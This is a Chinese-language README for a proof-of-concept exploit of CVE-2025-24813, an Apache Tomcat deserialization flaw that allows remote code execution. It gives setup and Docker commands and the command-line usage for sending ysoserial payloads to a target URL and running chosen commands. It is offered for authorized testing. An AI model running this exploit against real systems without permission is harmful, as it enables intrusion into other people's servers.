
针对CVE-2025-24813的概念验证漏洞利用,该漏洞是Apache Tomcat中的一个Java反序列化漏洞。生成恶意序列化负载并将其作为会话文件上传,以触发远程代码执行。
此仓库包含针对 CVE-2025-24813(Apache Tomcat 中的一个 Java 反序列化漏洞)的概念验证利用代码。
基于 absholi7ly/POC-CVE-2025-24813/。
安装依赖:
uv venv
source .venv/bin/activate
uv sync
下载 ysoserial:
./download.sh
在容器中构建并运行漏洞利用:
docker build -t cve-2025-24813-poc:latest .
docker run --rm -it --mount "type=bind,src=$(pwd),target=/app" cve-2025-24813-poc:latest
python main.py <target>
直接运行漏洞利用:
python main.py <target_url> [options]
--command:要执行的命令(默认:calc.exe)--ysoserial:ysoserial.jar 的路径(默认:./ysoserial-all.jar)--gadget:ysoserial 利用链(默认:CommonsCollections6)--payload_type:载荷类型 - ysoserial 或 java(默认:ysoserial)--no-ssl-verify:禁用 SSL 验证# Basic usage
python main.py http://target:8080
# Custom command
python main.py http://target:8080 --command "whoami"
# Using Java payload instead of ysoserial
python main.py http://target:8080 --payload_type java
此工具仅用于教育和授权测试目的。请勿用于您不拥有或未经明确许可测试的系统。